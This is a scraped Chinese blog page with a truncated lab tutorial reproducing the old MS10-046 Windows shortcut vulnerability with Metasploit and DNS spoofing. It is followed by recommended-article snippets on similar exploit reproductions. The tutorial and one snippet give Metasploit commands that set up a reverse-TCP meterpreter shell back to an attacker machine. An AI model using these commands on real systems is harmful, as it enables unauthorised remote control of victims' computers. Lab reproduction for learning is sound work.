MS10-046漏洞复现配合DNS欺骗

最新推荐文章于 2023-07-01 18:33:23 发布
最新推荐文章于 2023-07-01 18:33:23 发布
阅读量712 收藏 5
点赞数
文章标签: windows 安全 安全漏洞 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43655183/article/details/108441509
版权
本文详细介绍了如何复现MS10-046漏洞,通过生成攻击URL并利用Metasploit设置payload和参数,成功在靶机上getshell。同时,文章探讨了DNS挟持技术,展示了如何在特定目录下添加欺骗域名,并启动DNS欺骗。在靶机清理DNS缓存后,访问被欺骗域名时,将重新导向攻击机,再次实现远程控制。
摘要由CSDN通过智能技术生成

  • 利用ms10_046漏洞生成攻击URL:

    使用漏洞攻击模块

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

    设置payload

    set payload windows/meterpreter/reverse_tcp

    设置攻击参数

    set SRVHOST 攻击机IP
set LHOST	攻击机IP

    运行

    run

    使用msf

  • 在靶机上访问之前生成的URL

    在这里插入图片描述

    同时在攻击机上查看建立的会话 sessions

最低0.47元/天 解锁文章
带恶人歪仔
关注
渗透测试基础(六) MS10-046漏洞攻击
Venus_majian
06-24 125
MS10-046
ms10-061打印后台程序服务远程代码执行漏洞 成功复现xp&win7
田一柠的博客
12-15 1938
漏洞介绍 Windows打印后台程序没有充分限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在windows系统目录(%SystemRoot%\system32)中创建文件。 攻击者可指定任意文件名,包括目录遍历,通过发送WritePrinter请求,攻击者可以完全控制创建文件的内容。 将文件写入到windows系统目录后,通过WMI来部署恶意程序,因为系统会自动运行%SYstemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。 该漏洞首次被发现并应用于著名的S
MS10-046漏洞复现
weifengbbt的博客
11-08 1900
MS10-046漏洞复现0x00 前言0x01 环境0x02 过程0x03 结语0x04 建议 0x00 前言 这是我对msf里漏洞利用的学习记录 0x01 环境 1. 目标机环境 Windows xp sp3 IE7浏览器 2. 攻击机环境 kali 3. 拓扑结构 0x02 过程 1. 检查网络联通 ping 192.168.37.129 2. 启动Metasploit msfconsol...
漏洞复现---MS10-046漏洞
liu914589417的博客
04-27 5425
漏洞复现MS10-046漏洞 实验工具 1、VMware虚拟机 2、Windows7系统虚拟机 3、Kali 2021 系统虚拟机 1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。 2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。 3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。 4、引用编号
MS10-046文件快捷方式漏洞复现与利用
sGanYu
11-07 4936
攻击机:kali 靶机:windows xp sp2 使用metasploit框架,需要启用metasploit所依赖的postgresql数据库 在kali上启动postgresql命令【systemctl start postgresql】 如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开 启动msfconsole 搜索ms10-046相应的模块 这里有两个可利用的模块,browser.
微软MS10-046漏洞的利用
qq_50854662的博客
05-26 849
微软MS10-046漏洞的利用 0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构 0x02 过程1. 相互ping通2. 启动Metasploit3. 查找和MS10-046相关的模块4. 加载模块5. 设置所使用的payload6. 设置文件共享服务器的地址,应为BackTrack虚拟机的地址7. 设置目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址8. exploit9. 查看会话10. 进入交互模式11. 拿到shell 0x00 前言 这是我
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
内网CVE-2022-26923复现
include_voidmain的博客
05-23 1833
0x01 前言 Active Directory域权限提升漏洞(CVE-2022-26923)允许低权限用户在安装了 Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升到域管理员。 0x02 Active Directory 证书服务 AD CS 是Microsoft 的公钥基础结构 ( PKI ) 实施。由于AD在组织中提供了一定程度的信任,因此它可以用作CA来证明和委托信任。 AD CS用于多种用途,例如加密文件系统、创建和验证数字签名
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
MS11-046 ms11-080 提权exploit
12-02
MS11-046 ms11-080 两个本地提权漏洞 c语言版本exp 看雪牛人写出来的代码!
MS11-046WebShell下Exp自己加入的API成功后添加管理帐号
10-15
* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
【无标题】ms10_046复现
最新发布
m0_73853543的博客
07-01 116
ms10_046_shortcut_icon_dllloader漏洞利用和ettercap dns欺骗
weixin_30755393的博客
12-03 313
ms10_046_shortcut_icon_dllloader漏洞利用过程 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reve...
MS10-046漏洞测试
aozhuo4755的博客
11-09 721
这次用到MS10-046这个远程执行漏洞Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSFMetasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模...
MS10_046漏洞利用
彼岸花苏陌的博客
12-04 658
如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 ...
MS10-046_LNK文件快捷方式漏洞的原理分析(多图杀猫)
GaA.Ra的自留地 in Csdn
06-10 1万+
文件快捷方式漏洞MS10-046是除了n年前的动画光标(.ani)漏洞之外另一个让我觉得比较有趣的漏洞,毕竟是本机执行任意代码的权限,当然,n年前我还只是一个菜鸟,神马都不懂.       入正题吧,欢迎拍砖,大家一起进步.(后面我会把一些参考文章贴出来的)       由于MS10-046漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可
#windowsxpsp3系统MS10-046漏洞测试
bmxch的博客
01-24 580
一、影响环境 Windows 2000、WindowsXP、Windows server 2003、Windows Vista、Windows server 2008、Windows7 beta。 **二、**实验环境(虚拟机搭建) 目标主机:winxpsp3英文版:192.168.28.133 攻击主机:kaililinux:192.168.28.134 三、攻击过程 先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活 进入metasploit框架 Msfcons
DNS欺骗技术解析与防范
"这篇资料涉及的是DNS欺骗技术,并提到了相关源码的存在。DNS欺骗DNS Spoofing)是网络安全领域中的一个重要话题,它利用了DNS系统的工作原理,通过伪造DNS响应来误导用户访问错误的网站或获取敏感信息。文中提到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值